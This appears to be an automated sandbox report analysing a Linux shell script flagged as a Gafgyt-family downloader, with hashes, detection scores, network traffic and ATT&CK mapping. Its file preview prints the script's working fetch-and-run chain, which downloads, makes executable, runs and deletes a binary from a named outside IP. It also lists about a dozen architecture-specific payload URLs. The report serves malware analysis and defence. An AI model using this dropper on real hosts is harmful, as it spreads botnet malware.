Edit tour

Linux Analysis Report
Sakura.sh.bin

Overview

General Information

Sample name:Sakura.sh.bin
Analysis ID:1641762
MD5:57f1041fd8cdcbb4c369bb68bfd99db8
SHA1:15df867f11dbdfc5500cd0b4a750ab5b0f861a92
SHA256:6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380
Infos:

Detection

Score:64
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected ShellDownloader
Executes the "wget" command typically used for HTTP/S downloading
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1641762
Start date and time:2025-03-18 13:45:01 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 38s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Run name:Potential for more IOCs and behavior
Analysis Mode:default
Sample name:Sakura.sh.bin
Detection:MAL
Classification:mal64.troj.linBIN@0/0@0/0
  • VT rate limit hit for: http://45.135.194.28/a-r.m-4.Sakura;
  • VT rate limit hit for: http://45.135.194.28/a-r.m-7.Sakura;
  • VT rate limit hit for: http://45.135.194.28/m-6.8-k.Sakura;
  • VT rate limit hit for: http://45.135.194.28/m-i.p-s.Sakura
  • VT rate limit hit for: http://45.135.194.28/m-i.p-s.Sakura;
  • VT rate limit hit for: http://45.135.194.28/m-p.s-l.Sakura;
  • VT rate limit hit for: http://45.135.194.28/p-p.c-.Sakura;
  • VT rate limit hit for: http://45.135.194.28/x-3.2-.Sakura;
Command:bash "/tmp/Sakura.sh.bin"
PID:6213
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:--2025-03-18 07:45:43-- http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:45:46-- (try: 2) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:45:50-- (try: 3) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:45:54-- (try: 4) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:46:00-- (try: 5) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:46:07-- (try: 6) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:46:14-- (try: 7) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:46:23-- (try: 8) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.
  • system is lnxubuntu20
  • bash (PID: 6213, Parent: 6126, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /usr/bin/bash /tmp/Sakura.sh.bin
    • bash New Fork (PID: 6214, Parent: 6213)
    • wget (PID: 6214, Parent: 6213, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget http://45.135.194.28/m-i.p-s.Sakura
  • cleanup
SourceRuleDescriptionAuthorStrings
Sakura.sh.binJoeSecurity_ShellDownloaderYara detected ShellDownloaderJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Sakura.sh.binAvira: detected
    Source: Sakura.sh.binVirustotal: Detection: 64%Perma Link
    Source: Sakura.sh.binReversingLabs: Detection: 70%
    Source: /usr/bin/bash (PID: 6214)Wget executable: /usr/bin/wget -> wget http://45.135.194.28/m-i.p-s.SakuraJump to behavior
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/a-r.m-4.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/a-r.m-5.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/a-r.m-6.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/a-r.m-7.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/i-5.8-6.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/m-6.8-k.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/m-i.p-s.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/m-p.s-l.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/p-p.c-.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/s-h.4-.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/x-3.2-.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/x-8.6-.Sakura;
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

    System Summary

    barindex
    Source: Yara matchFile source: Sakura.sh.bin, type: SAMPLE
    Source: classification engineClassification label: mal64.troj.linBIN@0/0@0/0
    Source: /usr/bin/bash (PID: 6214)Wget executable: /usr/bin/wget -> wget http://45.135.194.28/m-i.p-s.SakuraJump to behavior
    Source: /usr/bin/bash (PID: 6213)Queries kernel information via 'uname': Jump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping1
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive12
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1641762 Sample: Sakura.sh.bin Startdate: 18/03/2025 Architecture: LINUX Score: 64 11 45.135.194.28, 49484, 49486, 49488 SKYLINKCZ Germany 2->11 13 109.202.202.202, 80 INIT7CH Switzerland 2->13 15 2 other IPs or domains 2->15 17 Antivirus / Scanner detection for submitted sample 2->17 19 Multi AV Scanner detection for submitted file 2->19 21 Yara detected ShellDownloader 2->21 7 bash 2->7         started        signatures3 process4 process5 9 bash wget 7->9         started       

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Sakura.sh.bin65%VirustotalBrowse
    Sakura.sh.bin71%ReversingLabsWin32.Trojan.Gafgyt
    Sakura.sh.bin100%AviraLINUX/Dldr.Agent.hlw
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches

    Download Network PCAP: filteredfull

    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://45.135.194.28/m-i.p-s.Sakurafalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://45.135.194.28/p-p.c-.Sakura;Sakura.sh.binfalse
        unknown
        http://45.135.194.28/m-p.s-l.Sakura;Sakura.sh.binfalse
          unknown
          http://45.135.194.28/a-r.m-7.Sakura;Sakura.sh.binfalse
            unknown
            http://45.135.194.28/x-3.2-.Sakura;Sakura.sh.binfalse
              unknown
              http://45.135.194.28/m-i.p-s.Sakura;Sakura.sh.binfalse
                unknown
                http://45.135.194.28/m-6.8-k.Sakura;Sakura.sh.binfalse
                  unknown
                  http://45.135.194.28/a-r.m-4.Sakura;Sakura.sh.binfalse
                    unknown
                    http://45.135.194.28/a-r.m-5.Sakura;Sakura.sh.binfalse
                      unknown
                      http://45.135.194.28/s-h.4-.Sakura;Sakura.sh.binfalse
                        unknown
                        http://45.135.194.28/a-r.m-6.Sakura;Sakura.sh.binfalse
                          unknown
                          http://45.135.194.28/i-5.8-6.Sakura;Sakura.sh.binfalse
                            unknown
                            http://45.135.194.28/x-8.6-.Sakura;Sakura.sh.binfalse
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              45.135.194.28
                              unknownGermany
                              213030SKYLINKCZfalse
                              109.202.202.202
                              unknownSwitzerland
                              13030INIT7CHfalse
                              91.189.91.43
                              unknownUnited Kingdom
                              41231CANONICAL-ASGBfalse
                              91.189.91.42
                              unknownUnited Kingdom
                              41231CANONICAL-ASGBfalse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                              • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                              91.189.91.43GwRba1mTFR.elfGet hashmaliciousUnknownBrowse
                                na.elfGet hashmaliciousPrometeiBrowse
                                  na.elfGet hashmaliciousPrometeiBrowse
                                    na.elfGet hashmaliciousPrometeiBrowse
                                      na.elfGet hashmaliciousPrometeiBrowse
                                        na.elfGet hashmaliciousPrometeiBrowse
                                          na.elfGet hashmaliciousPrometeiBrowse
                                            na.elfGet hashmaliciousPrometeiBrowse
                                              na.elfGet hashmaliciousPrometeiBrowse
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                  91.189.91.42GwRba1mTFR.elfGet hashmaliciousUnknownBrowse
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                      No context
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CANONICAL-ASGBhttps://paste.ubuntu.com/p/2xjw98FbQJGet hashmaliciousUnknownBrowse
                                                                      • 185.125.188.23
                                                                      2gkeFl1jcj.elfGet hashmaliciousUnknownBrowse
                                                                      • 185.125.190.26
                                                                      GwRba1mTFR.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 91.189.91.42
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 91.189.91.42
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 91.189.91.42
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 91.189.91.42
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 91.189.91.42
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 91.189.91.42
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 91.189.91.42
                                                                      CANONICAL-ASGBhttps://paste.ubuntu.com/p/2xjw98FbQJGet hashmaliciousUnknownBrowse
                                                                      • 185.125.188.23
                                                                      2gkeFl1jcj.elfGet hashmaliciousUnknownBrowse
                                                                      • 185.125.190.26
                                                                      GwRba1mTFR.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 91.189.91.42
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 91.189.91.42
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 91.189.91.42
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 91.189.91.42
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 91.189.91.42
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 91.189.91.42
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 91.189.91.42
                                                                      INIT7CHGwRba1mTFR.elfGet hashmaliciousUnknownBrowse
                                                                      • 109.202.202.202
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 109.202.202.202
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 109.202.202.202
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 109.202.202.202
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 109.202.202.202
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 109.202.202.202
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 109.202.202.202
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 109.202.202.202
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 109.202.202.202
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 109.202.202.202
                                                                      SKYLINKCZna.elfGet hashmaliciousPrometeiBrowse
                                                                      • 45.135.194.29
                                                                      boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                      • 45.135.194.29
                                                                      networkrip.mips.elfGet hashmaliciousMirai, GafgytBrowse
                                                                      • 45.135.194.61
                                                                      networkrip.armv7l.elfGet hashmaliciousMirai, GafgytBrowse
                                                                      • 45.135.194.61
                                                                      networkrip.x86.elfGet hashmaliciousMirai, GafgytBrowse
                                                                      • 45.135.194.61
                                                                      networkrip.arm4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                      • 45.135.194.61
                                                                      networkrip.ppc.elfGet hashmaliciousMirai, GafgytBrowse
                                                                      • 45.135.194.61
                                                                      networkrip.arm5.elfGet hashmaliciousMirai, GafgytBrowse
                                                                      • 45.135.194.61
                                                                      networkrip.mpsl.elfGet hashmaliciousMirai, GafgytBrowse
                                                                      • 45.135.194.61
                                                                      No context
                                                                      No context
                                                                      No created / dropped files found
                                                                      File type:Bourne-Again shell script, ASCII text executable
                                                                      Entropy (8bit):4.687336061912351
                                                                      TrID:
                                                                      • Linux/UNIX shell script (7007/1) 100.00%
                                                                      File name:Sakura.sh.bin
                                                                      File size:2'098 bytes
                                                                      MD5:57f1041fd8cdcbb4c369bb68bfd99db8
                                                                      SHA1:15df867f11dbdfc5500cd0b4a750ab5b0f861a92
                                                                      SHA256:6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380
                                                                      SHA512:fe018d3aa481c685d6e6b30c982050d33f8901dbe5054ed2d0fa8035353441731fc9255345c454e505492ea075936350bdb33303cdc2d83df2f9f55b80665a56
                                                                      SSDEEP:48:vWd8jhttQdMwYnRV7WT68CwIDL1B5NwITxST:vWd8jhttQdMwYnRV7WT68CwIDBB5NwIw
                                                                      TLSH:BD412BD7119247F32C90DC3772698480F6D4919A9AC6AF4ABEDC3CE448BEDEC7444683
                                                                      File Content Preview:#!/bin/bash.cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.135.194.28/m-i.p-s.Sakura; chmod +x m-i.p-s.Sakura; ./m-i.p-s.Sakura; rm -rf m-i.p-s.Sakura.cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.135.194.28/

                                                                      Download Network PCAP: filteredfull

                                                                      • Total Packets: 77
                                                                      • 443 (HTTPS)
                                                                      • 80 (HTTP)
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Mar 18, 2025 13:45:44.261095047 CET4948480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:44.268249035 CET804948445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:44.268352985 CET4948480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:44.270634890 CET4948480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:44.278184891 CET804948445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:45.931258917 CET804948445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:45.933849096 CET4948480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:45.939425945 CET804948445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:45.943042994 CET42836443192.168.2.2391.189.91.43
                                                                      Mar 18, 2025 13:45:46.940417051 CET4948680192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:46.945281982 CET804948645.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:46.945382118 CET4948680192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:46.947782993 CET4948680192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:46.952522039 CET804948645.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:47.734869003 CET4251680192.168.2.23109.202.202.202
                                                                      Mar 18, 2025 13:45:48.607059956 CET804948645.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:48.609559059 CET4948680192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:48.614316940 CET804948645.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:50.615875006 CET4948880192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:50.621520996 CET804948845.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:50.621597052 CET4948880192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:50.623742104 CET4948880192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:50.629209042 CET804948845.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:52.279788971 CET804948845.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:52.282191992 CET4948880192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:52.283001900 CET4948880192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:52.288599014 CET804948845.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:55.289772034 CET4949080192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:55.294534922 CET804949045.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:55.294662952 CET4949080192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:55.296960115 CET4949080192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:55.301661968 CET804949045.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:56.935837030 CET804949045.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:45:56.937453032 CET4949080192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:56.938082933 CET4949080192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:45:56.942811012 CET804949045.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:00.533027887 CET43928443192.168.2.2391.189.91.42
                                                                      Mar 18, 2025 13:46:00.943634033 CET4949280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:00.948394060 CET804949245.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:00.948546886 CET4949280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:00.951803923 CET4949280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:00.956476927 CET804949245.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:02.611524105 CET804949245.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:02.612665892 CET4949280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:02.613991976 CET4949280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:02.618623972 CET804949245.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:07.621417999 CET4949480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:07.626197100 CET804949445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:07.626410007 CET4949480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:07.629508972 CET4949480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:07.634180069 CET804949445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:09.265435934 CET804949445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:09.267772913 CET4949480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:09.269216061 CET4949480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:09.273874998 CET804949445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:12.819417000 CET42836443192.168.2.2391.189.91.43
                                                                      Mar 18, 2025 13:46:15.274492025 CET4949680192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:15.279438972 CET804949645.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:15.279526949 CET4949680192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:15.281068087 CET4949680192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:15.285765886 CET804949645.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:16.902945042 CET804949645.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:16.905426025 CET4949680192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:16.910130024 CET804949645.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:18.962558031 CET4251680192.168.2.23109.202.202.202
                                                                      Mar 18, 2025 13:46:23.910670996 CET4949880192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:23.915533066 CET804949845.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:23.915684938 CET4949880192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:23.917514086 CET4949880192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:23.922199965 CET804949845.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:25.546727896 CET804949845.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:25.549228907 CET4949880192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:25.555023909 CET804949845.135.194.28192.168.2.23
